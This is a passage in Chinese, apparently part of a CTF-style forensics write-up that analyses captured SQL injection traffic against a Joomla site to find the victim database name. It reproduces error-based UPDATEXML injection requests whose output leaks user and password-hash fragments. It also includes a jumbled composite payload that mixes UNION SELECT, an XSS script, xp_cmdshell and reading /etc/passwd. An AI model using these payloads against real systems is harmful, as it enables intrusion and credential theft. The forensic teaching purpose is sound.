XfqR=2916AND1=1UNIONALLSELECT1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
可以看到,XfqR=2916 这一条件不成立,从而触发报错,敏感信息随报错信息一并泄露出来。
0x04 第一个受害主机网站数据库的名字
黑客爆出数据的最后一条注入语句中必然带有相应的数据库名,例如 FROM A.B 中,A 是数据库名,B 是表名。查看最后一条 SQL 注入请求,解码后可得如下语句(FROM 之后即为“库名.表名”):
(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username ASCHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),4235))
Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq'SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`
Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq'SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`
Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq'SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`